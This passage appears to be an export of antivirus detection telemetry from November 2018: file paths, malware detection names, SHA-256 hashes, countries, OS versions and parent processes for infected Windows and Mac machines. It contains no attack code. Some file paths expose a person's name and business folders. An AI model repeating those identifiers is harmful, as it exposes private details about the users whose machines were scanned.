  Row(detection=Row(filename='dwr_server_behaviors_sb_33.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_server_behaviors_sb_33.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='d33ddce829b0e380244358922c831c331dbab3722bbc94bc835f430157e22625', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-02T07:10:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:32:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='protection for autorun.exe', filepath='F:\\autorun.inf\\Protection for Autorun.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1810432, timestamp='2018-11-02T10:38:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T01:58:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062044-8b24ee2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-062044-8B24EE2E', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:23:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-134422-21e0650b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134422-21E0650B', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:44:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134201-06cfeaff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134201-06CFEAFF', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfDC08.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:32:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093758-9e8e6341', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b0411a2d\\AVSCAN-20181104-093748-9CD4BB74\\AVSCAN-20181104-093758-9E8E6341', filesize=64000, name='HEUR/AGEN.1000534.#M1.#R1'), hash='ff8f4570063ff347c2023453a77c1f5354ce3609ffeeacf8c4d4f85700b1ef0f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:38:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174816-3b71fc5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ac94082d\\AVSCAN-20181104-174721-33709828\\AVSCAN-20181104-174816-3B71FC5F', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='e733cf022d278b3e4597142d9acba4dade4653d8b5cdd3d6b3e1860f30789812', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:48:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150934-f597a590', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150934-F597A590', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002914b8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002914b8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:50:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290b03', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290b03', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:38:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spare.exe', filepath='\\\\Pc4-pc\\d\\eissa\\Spare.exe', filesize=3072000, name='W32/Alman.BB.#M1.#R1'), hash='cd202229f34648202ed5f2b27759e365031e8a08d3e619597a6b9abf72ef735c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T08:00:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210729-6dbffa74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5129c324\\AVSCAN-20181104-210448-584E1AA5\\AVSCAN-20181104-210729-6DBFFA74', filesize=320000, name='TR/AD.CoinMiner.xxwsa.#M1.#R1'), hash='ced46d99ebf179274add883a3e6a7ad3c3ecf4cd739ea540de0f7a8c9bd3c44b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:07:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='enviacargaredecard.exe', filepath='C:\\Users\\X\\Desktop\\FINANCEIRO\\Pastas Diversas\\Backup SiTef\\2016-04-01-SiTef\\APLIC.WIN\\enviacargaredecard.exe', filesize=128000, name='W32/Sality.Y.#M1.#R1'), hash='e9edf33dfd617ac9a998b1dc917665dc643a5d140b17963a04f08a50b7d41ec5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T08:52:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:03:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kmspico v10.1.7.exe', filepath="\\\\?\\D:\\Download en Brand programma's\\Microsoft Office 2016 NL\\Office_2016_NL\\AutoPlay\\Docs\\KMSPico v10.1.7.exe", filesize=4096000, name='SPR/Hacktool.740032.#M1.#R1'), hash='e9d55ee4a70c77183040ee79643d6caef0ff6566c45a21ae2fccd0f85f7e6930', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='webdbg.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio .NET 2003\\Common7\\Tools\\WebDbg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='f59808154fc19bdae8d213c379265e5c61c08e477f9fbaea9203eeeb522d70c9', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:05:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zemax.exe', filepath='\\\\?\\G:\\_big 128\\_cad 65\\Zemax OpticStudio 13 Release 2 Sp4 Premium\\1\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='ff573d5ea1cd7a2912ddc3892e1a23c4ddeac81ae1525b27f0f6216155c86646', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:49:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-082319-14e019e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_907857d7\\AVSCAN-20181104-082301-10DC6682\\AVSCAN-20181104-082319-14E019E9', filesize=64000, name='TR/KillAll.zxrko.#M1.#R1'), hash='f7a90a048a56ad18b6598812df82e3490bc063fbbbcf2ab99d21af2f31d345c8', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:23:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00252071', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252071', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:37:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:39:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa7496411dbaee0e9fa5071c85091c785300d2fad67c619fa89527ffc0f1cd6c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FA7496411DBAEE0E9FA5071C85091C785300D2FAD67C619FA89527FFC0F1CD6C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fa7496411dbaee0e9fa5071c85091c785300d2fad67c619fa89527ffc0f1cd6c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:27:43Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe869_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe869 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T05:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\MailContactsCalendarSync\\S-1-5-35\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:26:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dccw.exe', filepath='C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='1a6ac4f7fb1d4238cbfa903d3ff204a10a763c63e97fb01aac8d47aaf99a4f2d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1a9f85c83ab634e3b53bdef15224bbb200ca065ec6c391ad9f8d6fc55180801a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\1A9F85C83AB634E3B53BDEF15224BBB200CA065EC6C391AD9F8D6FC55180801A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1a9f85c83ab634e3b53bdef15224bbb200ca065ec6c391ad9f8d6fc55180801a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:01:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='menusystem.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\menusystem\\menusystem.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='63e02cdd62fff834a1a9443a44b4d8b6af1fb396dd3f48dc29f1db6c6ea87efe', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.exe', filepath='\\\\?\\C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:03:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160034-f0fc3901', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160034-F0FC3901', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\NVIDIA Corporation\\Update Core\\NvBackend.exe', parentsize=2655520, timestamp='2018-11-02T23:27:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2206716\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\MP3Rocket_Setup (1).exe', parentsize=1844048, timestamp='2018-11-02T20:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T07:13:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\USERS\\X\\APPDATA\\LOCAL\\Temp\\tmp8737939\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:01:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Sample Pictures\\Pictures.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8642ebe2_840e707b.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8642ebe2_840e707b.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='idm-6.2.x-patch.exe', filepath='H:\\org mmak\\org\\org 2014\\yessssss net\\2014\\2015\\Internet Download Manager 6.21 Build 18 Final\\IDM-6.2.X-Patch.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R1748'), hash='430cd623c075cb0a757dd832890558020f5c17fda937bde651029c0b69144d15', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T16:40:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=960000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='1e9f578de8dd27f6c1cddbc8ccb787323dd0fb7bd5d1f5a800f3f9ef0cede19d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T01:00:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3B73BD498639EBC739E66DA0B4199A1F532B20159F5D01485991B2F0BF50CA48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:16Z'), dt=datetime.date(2018, 11, 2)),
